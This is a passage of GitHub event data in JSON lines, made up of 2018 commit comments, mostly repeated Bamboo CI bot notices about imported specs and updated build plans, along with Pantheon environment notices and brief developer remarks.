updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:30:09Z"}
{"id":"8030141596","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862221,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-27T18:30:37Z","updated_at":"2018-07-27T18:30:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:30:37Z"}
{"id":"8030143442","type":"CommitCommentEvent","actor":{"login":"mczochara"},"repo":{"name":"mczochara/test1"},"payload":{"comment":{"id":29862226,"position":null,"line":null,"path":null,"commit_id":"bcba2118cb7a5c483109893da21077d6c2305124","created_at":"2018-07-27T18:31:00Z","updated_at":"2018-07-27T18:31:00Z","author_association":"OWNER","body":"Theme 1"}},"created_at":"2018-07-27T18:31:00Z"}
{"id":"8030143967","type":"CommitCommentEvent","actor":{"login":"carlcamusa"},"repo":{"name":"20H-Talent/ikigai-project-5-manuhdez"},"payload":{"comment":{"id":29862228,"position":null,"line":null,"path":null,"commit_id":"25b8add0bdc8c167f85bda194e4e37d57f17c5de","created_at":"2018-07-27T18:31:07Z","updated_at":"2018-07-27T18:31:07Z","author_association":"CONTRIBUTOR","body":"I would rather use something like this:\r\n\r\nconst captions = [\r\n    {\r\n        number: 1,\r\n        text: \"I love hay bales. Took this snap on a drive through the countryside past some straw fields.\"\r\n    },\r\n    {\r\n        number: 2,\r\n        text: \"The lake was so calm today. We had a great view of the snow on the mountains from here.\"\r\n    },\r\n    ...\r\n];"}},"created_at":"2018-07-27T18:31:07Z"}
{"id":"8030144495","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862229,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-27T18:31:13Z","updated_at":"2018-07-27T18:31:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:31:13Z"}
{"id":"8030145256","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862232,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T18:31:23Z","updated_at":"2018-07-27T18:31:23Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:31:23Z"}
{"id":"8030148262","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862243,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-27T18:32:03Z","updated_at":"2018-07-27T18:32:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:32:03Z"}
{"id":"8030148720","type":"CommitCommentEvent","actor":{"login":"mbeccalossi"},"repo":{"name":"mbeccalossi/op5"},"payload":{"comment":{"id":29862244,"position":null,"line":null,"path":null,"commit_id":"9b35285b983364d8ee66eec409d1882110bc0267","created_at":"2018-07-27T18:32:10Z","updated_at":"2018-07-27T18:32:10Z","author_association":"OWNER","body":"@nathanchance Treblized OmniROM is using the external module, and since there was no way I could get Wi-Fi to work with Flash this is a lazy attempt to keep things simple and make it work (except in the end it wouldn't load anyway...)"}},"created_at":"2018-07-27T18:32:10Z"}
{"id":"8030149529","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862246,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-27T18:32:19Z","updated_at":"2018-07-27T18:32:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:32:19Z"}
{"id":"8030150554","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29862250,"position":null,"line":null,"path":null,"commit_id":"de85f5ea514159eca12a9661af2974e8e2a8ad97","created_at":"2018-07-27T18:32:31Z","updated_at":"2018-07-27T18:32:31Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-999](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-999).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-999-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-27T18:32:31Z"}
{"id":"8030150800","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862251,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T18:32:34Z","updated_at":"2018-07-27T18:32:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:32:34Z"}
{"id":"8030154875","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862269,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-27T18:33:20Z","updated_at":"2018-07-27T18:33:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:33:20Z"}
{"id":"8030155535","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862273,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-27T18:33:28Z","updated_at":"2018-07-27T18:33:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:33:28Z"}
{"id":"8030156850","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862278,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-27T18:33:45Z","updated_at":"2018-07-27T18:33:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:33:45Z"}
{"id":"8030160380","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862290,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-27T18:34:32Z","updated_at":"2018-07-27T18:34:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:34:32Z"}
{"id":"8030160720","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862291,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-27T18:34:36Z","updated_at":"2018-07-27T18:34:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:34:36Z"}
{"id":"8030162290","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862296,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-27T18:34:55Z","updated_at":"2018-07-27T18:34:55Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:34:55Z"}
{"id":"8030164006","type":"CommitCommentEvent","actor":{"login":"karthiknadig"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29862302,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-27T18:35:17Z","updated_at":"2018-07-27T18:35:17Z","author_association":"OWNER","body":"@DonJayamanne I took a bunch of attempts at reverting 499 and 475. I doesn't look like there is a clean way to revert it. I could not revert it without introducing several new issues. We could try one of two options, revert to commit before 475 and cherry pick. Or, apply fixes over current master.\r\nWhat do you suggest?"}},"created_at":"2018-07-27T18:35:17Z"}
{"id":"8030166015","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862307,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-27T18:35:44Z","updated_at":"2018-07-27T18:35:44Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:35:44Z"}
{"id":"8030166135","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862310,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-27T18:35:46Z","updated_at":"2018-07-27T18:35:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:35:46Z"}
{"id":"8030167708","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862315,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-27T18:36:05Z","updated_at":"2018-07-27T18:36:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:36:05Z"}
{"id":"8030168295","type":"CommitCommentEvent","actor":{"login":"alex8530"},"repo":{"name":"alex8530/antdroidProjectTest"},"payload":{"comment":{"id":29862316,"position":null,"line":null,"path":null,"commit_id":"4312d551d06ca6ef3de5645ab56ead1ed679fefc","created_at":"2018-07-27T18:36:13Z","updated_at":"2018-07-27T18:36:13Z","author_association":"OWNER","body":"thats dood"}},"created_at":"2018-07-27T18:36:13Z"}
{"id":"8030169920","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29862319,"position":null,"line":null,"path":null,"commit_id":"877b7fadd9a3c4e5d3db4121113f71f6149c054a","created_at":"2018-07-27T18:36:34Z","updated_at":"2018-07-27T18:36:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-434](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-434).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-434-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-27T18:36:34Z"}
{"id":"8030171148","type":"CommitCommentEvent","actor":{"login":"waaronmorris"},"repo":{"name":"waaronmorris/CS162_Group_15_Project_1"},"payload":{"comment":{"id":29862322,"position":111,"line":96,"path":"main.cpp","commit_id":"447fb43f40ba31980173a0cb3d8e9dfa095bc52d","created_at":"2018-07-27T18:36:50Z","updated_at":"2018-07-27T18:36:50Z","author_association":"OWNER","body":"@Ibrahim9999 I'm gonna add your rows and columns input variables here. "}},"created_at":"2018-07-27T18:36:50Z"}
{"id":"8030171245","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862323,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-27T18:36:51Z","updated_at":"2018-07-27T18:36:51Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:36:51Z"}
{"id":"8030171427","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862325,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-27T18:36:54Z","updated_at":"2018-07-27T18:36:54Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-27T18:36:54Z"}
{"id":"8030171855","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862327,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-27T18:36:59Z","updated_at":"2018-07-27T18:36:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:36:59Z"}
{"id":"8030173186","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862328,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-27T18:37:16Z","updated_at":"2018-07-27T18:37:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:37:16Z"}
{"id":"8030173846","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29862332,"position":null,"line":null,"path":null,"commit_id":"ab7583bca5ceb52120bfff19e353d0c1f3edb721","created_at":"2018-07-27T18:37:25Z","updated_at":"2018-07-27T18:37:25Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-112](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-112).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-112-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-27T18:37:25Z"}
{"id":"8030176474","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29862340,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-27T18:38:00Z","updated_at":"2018-07-27T18:38:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T18:38:00Z"}
{"id":"8030177107","type":"CommitCommentEvent","actor":{"login":"waaronmorris"},"repo":{"name":"waaronmorris/CS162_Group_15_Project_1"},"payload":{"comment":{"id":29862344,"position":119,"line":101,"path":"main.cpp","commit_id":"447fb43f40ba31980173a0cb3d8e9dfa095bc52d","created_at":"2018-07-27T18:38:09Z","updated_at":"2018-07-27T18:38:09Z","author_association":"OWNER","body":"@Ibrahim9999 Do you create any random variables or should I add them to randomly generate the location the Critter is create? "}},"created_at":"2018-07-27T18:38:09Z"}
